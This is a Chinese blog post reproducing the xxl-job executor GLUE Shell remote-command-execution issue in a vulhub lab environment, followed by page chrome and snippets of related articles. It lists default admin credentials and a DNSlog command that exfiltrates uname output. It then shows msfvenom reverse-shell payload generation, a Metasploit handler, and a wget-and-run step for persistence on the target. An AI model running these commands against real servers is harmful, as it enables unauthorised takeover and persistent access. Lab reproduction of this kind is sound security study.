xxl-job-执行器-RESTful-API-未授权访问-RCE

最新推荐文章于 2024-04-10 14:11:00 发布
最新推荐文章于 2024-04-10 14:11:00 发布
阅读量2.8k 收藏 3
点赞数
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41659863/article/details/127492377
版权

1、漏洞描述及范围

描述

在xxl-job 执行器中,GLUE脚本代码,可以直接执行shell命令

范围

2、环境搭建

git clone https://github.com/vulhub/vulhub.git

cd vulhub/xxl-job/unacc/

docker-compose up -d

http://host:8080/xxl-job-admin/toLogin 任务调度中心登录

 

 

admin/123456

http://host:9999

 

3、漏洞利用

实现一键完成结果

判断其主机版本 dnslog 外带

ping -c 1 `uname -a| awk '{print $3}'`.25804b6b.dns.1433.eu.org

http://host:8080/xxl-job-admin/toLogin 任务调度中心登录

admin/123456

任务中心新增

 

运行模式选择  GLUE Shell 

可直接执行shell命令

其余随便填填即可

 

操作编辑 刚刚新增的GLUE IDE

 

uname 版本外带

DNSLOG Platform dnslog 网站生成一个域名

 

ping -c 1 `uname -a| awk '{print $3}'`.5c3d45f9.dns.1433.eu.org

保存执行

 

 

版本外带成功

 

 

msf 生成木马,维权

生成木马 linux 32位 

回连目标 <lhost >

回连端口 28081

 

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<lhost > LPORT=28081 -f elf > shell.elf
 

 

 

 
 

 

 

shell.elf 
 

python3 -m http.server 8888  #开启8888端口共享
 

 

 

 

msf
 

msfconsole
 

 

 

use exploit/multi/handler 
set payload  linux/x86/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 28081
exploit



 

 

 

 
 

 

 

下载添加执行
 

 

 

wget http://host:8888/shell.elf 
chmod +x shell.elf
./shell.elf
 

 

将上面语句添加到命令执行的地方,和之前的uname 外带一致
 

 

 

 
 

 

 

 

 

然后保存执行
 

 

 

 

 
 

 
 

看到已经上线
 

 

 

 

4、源代码分析
 

 search  -f xxl-job* 搜索源码
 

 

 

 
 

 

下载 xxl-job-executor-sample-springboot-2.2.0.jar
 

download /usr/src/xxl-job-executor-sample-springboot-2.2.0.jar
 

 

 
 

 

下载到了 /root 目录下,下载到本地
 

 

 

没看懂
 

 


                

        

        

    




    

      

        

            

              
                
                  qq_41659863
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                      0
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    3
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      










                



	

		

			

				
					
XXL-JOB executor授权访问漏洞

				
			

			

				

					jammny
				

				

					12-04
					
					8425
					
				

			

		

		

			
				
漏洞详情

XXL-JOB是一个轻量级分布式任务调度平台。默认情况下XXL-JOBRestful API接口或RPC接口没有配置认证措施,授权的攻击者可构造恶意请求,造成远程执行命令,直接控制服务器。

漏洞影响

XXL-JOB <= 2.2.0

漏洞分析

XXL-JOBRestful API分为两种,一个调度中心Restful API,一个执行器Restful API。其中在执行器Restful API的任务触发声明中,发送请求的数据格式为:


地址格式:
    {执行器内嵌服务..

			
		

	



                

              
                



	

		

			

				
					
探索XXL-JOB-RCE:一款强大的远程代码执行工具

				
			

			

				

					gitblog_00074的博客
				

				

					04-02
					
					735
					
				

			

		

		

			
				
探索XXL-JOB-RCE:一款强大的远程代码执行工具
项目地址:https://gitcode.com/mrknow001/xxl-job-rce

项目简介
XXL-JOB-RCE 是一个针对 XXL-JOB 远程命令执行漏洞的利用工具。XXL-JOB 是一个轻量级分布式任务调度平台,广泛用于企业中进行定时任务的管理和执行。然而,XXL-JOB 在某些版本存在安全缺陷,允许攻击者通过精心构造的...

			
		

	



                


  
              

                


	

		

			

				
					
XXL-JOB executor 授权访问漏洞

				
			

			

				

					qq_59201520的博客
				

				

					03-28
					
					7997
					
				

			

		

		

			
				
XXL-JOB executor 授权访问漏洞的漏洞复现和一些理解思考以及复现过程中的问题和解决

			
		

	





	

		

			

				
					
浅析xxl-obj分布式任务调度平台RCE漏洞

				
			

			

				

					道阻且长,行则将至。
				

				

					12-29
					
					3177
					
				

			

		

		

			
				
XXL-JOB 任务调度中心系统这几年被披露出存在多个后台命令执行漏洞,攻击者可以通过反弹 shell 执行任意命令,获取服务器管理权限。本文来分析、总结下 XXL-JOB 系统历史上几个 RCE 漏洞,为攻防工作积累 RCE 高危漏洞知识库。

			
		

	



		

			
		



	

		

			

				
					
xxl-jobRCE授权远程命令执行分析+POC测试

				
			

			

				

					Delphinidae
				

				

					11-05
					
					5562
					
				

			

		

		

			
				
xxl-job】远程命令执行漏洞
【参考地址】https://github.com/mrknow001/xxl-job-rce
【实际测试】指纹收集,指纹信息是respose 返回如下的可以试试
{“msg”:“invalid request, HttpMethod not support.”}


指纹收集:fofa,shodan
ps: 只用于问题验证测试,禁止进行非法活动

...

			
		

	





	

		

			

				
					
Goby 内测版1.8.221 | 启动爬虫,继续助力红队

				
			

			

				

					m0_46699477的博客
				

				

					11-09
					
					1006
					
				

			

		

		

			
				
针对近期连续性的地方hvv,本次更新继续助力红队队员!除了一大大大波近期新爆出的漏洞及hvv漏洞,还新增了蜜罐识别类型及特征,以及终于支持了网页爬虫!

文章看到底,找此版本的获取方式↓文章看到底,找此版本的获取方式↓

0x001 新增漏洞
新增漏洞高达30条:包含CVE-2020-14882/CVE-2020-14750、CVE-2020-14883、XXL-JOB API Unauthenticated RCE、VMware等新爆漏洞, Weaver_e-Bridge_File_Read、Yonyou

			
		

	





	

		

			

				
					
xxl-job实战源码

				
			

			

				

					03-24
				

			

		

		

			
				
 - RESTful API:调度中心与执行器之间的通信基于HTTP,使用RESTful API进行任务调度和状态同步。  3. **数据存储**  - MySQL存储:任务信息、调度日志等数据存储在MySQL数据库中,便于查询和管理。  4. **消息队列*...

			
		

	





	

		

			

				
					
xxl-job-springboot_xxl-job_

				
			

			

				

					10-03
				

			

		

		

			
				
通常需要添加XXL-Job的相关依赖,并配置相应的调度和执行器地址,以便让SpringBoot应用成为XXL-Job的执行节点。  3. **源代码分析**  压缩包中的`xxl-job-springboot`可能包含了一个示例或者模板项目,该项目演示了...

			
		

	





	

		

			

				
					
xxl-job-2.3.1

				
			

			

				

					06-19
				

			

		

		

			
				
XXL-JOB是一个分布式任务调度平台,主要由调度中心(XXL-JOB-SCHEDULER)和执行器XXL-JOB-EXECUTOR)两部分组成。版本2.3.1是该平台的一个稳定版本,提供了丰富的功能和优化,旨在帮助开发者实现简单、高效且可...

			
		

	





	

		

			

				
					
xxl-job-2.3.0.zip

				
			

			

				

					09-01
				

			

		

		

			
				
 如果执行器节点发生故障,XXL-JOB会自动将任务转发到其他可用节点,确保任务的执行不中断。同时,还支持任务失败后的重试机制,增强了任务的健壮性。  8. **分布式锁**:  为了保证分布式环境下任务的幂等性,XXL-...

			
		

	





	

		

			

				
					
xuxueli0323-xxl-job-v2.2.0.zip

				
			

			

				

					03-21
				

			

		

		

			
				
 - **安装部署**:下载`xxl-job-admin`和`xxl-job-executor`项目,分别作为调度中心和执行器部署。配置数据库连接、调度中心地址等信息。  - **任务创建**:登录Web界面,创建任务,定义任务的执行类、参数、触发...

			
		

	





	

		

			

				
					
【漏洞库】XXL-JOB executor 授权访问漏洞导致RCE

				
			

			

				

					yuan_boss的博客
				

				

					11-03
					
					957
					
				

			

		

		

			
				
XXL-JOB分为admin和executor两端,前者为后台管理页面,后者是任务执行的客户端。注意,我们编写的EXP只能用一次,如果第二次用其他命令就无法命令执行了,除非目标的服务重启,我们才能执行其他的命令,不然只能一直使用第一次用的EXP。该问题类似于将一台Mysql、Redis实例,不设置密码并开放给公网,严格来说不能因此说Mysql、Redis有漏洞,只需要设置密码即可。复现环境与复现参考链接:https://vulhub.org/#/environments/xxl-job/unacc/

			
		

	





	

		

			

				
					
xxl-job反序列化漏洞分析复现

				
			

			

				

					panda的博客
				

				

					10-20
					
					3900
					
				

			

		

		

			
				
xxl-job反序列化分析复现

			
		

	





	

		

			

				
					
XXL-JOB v2.4.0 发布 | 安全漏洞修复

				
			

			

				

					许雪里
				

				

					03-23
					
					1841
					
				

			

		

		

			
				
XXL-JOB是一个轻量级分布式任务调度平台,其核心设计目标是开发迅速、学习简单、轻量级、易扩展。现已开放源代码并接入多家公司线上产品线,开箱即用。[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-L8Hjsl4t-1586859195388)(https://upload-images.jianshu.io/upload_images/3165072-2124d438362d68e5.png “在这里输入图片标题”)]

			
		

	





	

		

			

				
					
XXL-JOB任务调度中心后台命令执行漏洞

				
			

			

				

					chaojixiaojingang
				

				

					04-13
					
					4945
					
				

			

		

		

			
				
1.漏洞描述

 XXL-JOB任务调度中心后台存在命令执行漏洞,攻击者可在后台通过写入shell命令任务调度获取服务器控制权限。

2.资产查找

FOFA:app="XXL-JOB" || title="任务调度中心"

3.漏洞复现

1)以默认弱口令admin/123456进入后台

http://ip/toLogin



2)选择任务管理模块,新增任务

(PS:运行模式选择GLUE(Shell))



3)点击 GLUE IDE编辑脚本,输入命令



4)操作选择执行一次


...

			
		

	





	

		

			

				
					
一次代码审计到RCE的实战渗透案例

				
			

			

				

					weixin_40418457的博客
				

				

					04-30
					
					978
					
				

			

		

		

			
				
某次做项目的时候遇到了XXL-JOB,当时并公开任何xxl-job的漏洞,于是有了下面的代码审计,找到一处API接口的RCE,拿下一个严重漏洞。
一、XXL-JOB简介
XXL-JOB是一个分布式任务调度平台,其核心设计目标是开发迅速、学习简单、轻量级、易扩展。现已开放源代码并接入多家公司线上产品线,开箱即用。简单来说,xxl-job用于管理分布式任务,若任务的管理功能出现授权访问,将造成相当大的影响。
二、代码审计
1.下载xxl-job的源码,查看项目的开发框架、根据框架特性查找所有的API接口
访

			
		

	





	

		

			

				
					
XXL-JOB 针对授权访问导致远程命令执行漏洞的声明

				
			

			

				

					zhenghhgz的博客
				

				

					10-31
					
					5800
					
				

			

		

		

			
				
IT实战联盟博客:http://blog.100boot.cn

对于日前 XXL-JOB被各大云厂商报出存在远程命令执行漏洞的情况,XXL-JOB 作者表示此问题本质上不是“漏洞”,因为官网版本已提供鉴权组件,开启即可防护。具体回应如下:


该问题本质上不属于“漏洞”,官网版本提供了鉴权组件,开启即可进行防护。

该问题类似于将一台 Mysql、Redis 实例,不设置密码并开放给公网,严格来说不能因此说 Mysql、Redis 有漏洞,只需要设置密码即可。


针对此问题,XXL-JOB 作者提供了.

			
		

	





	

		

			

				
					
XXL-JOB executor 授权访问漏洞_xxl-job漏洞(1),2024年最新熬夜肝完这份Framework笔记

					
最新发布

				
			

			

				

					2401_84185224的博客
				

				

					04-10
					
					728
					
				

			

		

		

			
				
glueType”:“BEAN”,         //任务模式,可选值参考com.xx1.job.core.glue.alueTypeEnum。“executorTimeout”😮,                 //任务超时时间,单位秒,大于零时生效。“executorB1ockstrategy”:“cOVER_EARLY”, //任务阻塞策略,可选值参考。“gluesource”:“xxx”,               //GLUE脚本代码。“jobId”:1,   //任务ID。

			
		

	





	

		

			

				
					
xxl-job访问令牌错误

				
			

			

				

					08-19
				

			

		

		

			
				
xxl-job访问令牌错误是指在xxl-job分布式任务调度平台中,访问令牌被错误地使用或提供,导致无法正常访问或执行任务的情况。根据引用和引用的描述,xxl-job默认情况下没有配置认证措施,即没有对访问令牌进行验证。这意味着授权的攻击者可以构造恶意请求,通过Restful API接口或RPC接口执行任意命令,进而控制服务器。因此,在xxl-job的安全配置中,正确设置和使用访问令牌是非常重要的。<span class="em">1</span><span class="em">2</span><span class="em">3</span>
#### 引用[.reference_title]
-  *1* [xxl-job2.3.0集成nacos配置,注册中心](https://download.csdn.net/download/weixin_44618291/85347103)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"]
-  *2* [漏洞复现----21、XXL-JOB executor 授权访问漏洞](https://blog.csdn.net/sycamorelg/article/details/118609173)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"]
-  *3* [XXL-JOB executor授权访问漏洞](https://blog.csdn.net/qq_41832837/article/details/110632861)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"]
[ .reference_list ]

			
		

	



              



  
“相关推荐”对你有帮助么?

  

      
    
          
  • 
              
    
                  
                  
              
    
              
    非常没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    一般
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    有帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    非常有帮助
    
          
    • 
      

      

      

          
          提交
      

      

  




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值